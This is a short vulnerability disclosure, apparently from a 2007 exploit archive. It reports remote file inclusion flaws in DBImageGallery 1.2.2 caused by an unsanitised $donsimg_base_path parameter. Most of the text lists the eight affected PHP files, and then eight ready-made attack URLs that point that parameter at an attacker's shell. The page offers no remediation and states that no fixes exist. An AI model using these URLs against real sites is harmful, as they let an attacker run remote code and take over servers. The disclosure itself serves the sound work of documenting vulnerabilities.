DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities

2007-02-21 00:00:00

DBImageGallery 1.2.2

*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:

admin/attributes.php require_once $donsimg_base_path
admin/images.php require_once $donsimg_base_path
admin/scan.php require_once $donsimg_base_path
includes/attributes.php require_once $donsimg_base_path
includes/db_utils.php require_once $donsimg_base_path
includes/images.php require_once $donsimg_base_path
includes/utils.php require_once $donsimg_base_path
includes/values.php require_once $donsimg_base_path



**************************************************************************************
RFI:

http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]


**************************************************************************************
denven[at]gmail[dot]com

#

Fixes

No fixes

In order to submit a new fix you need to be registered.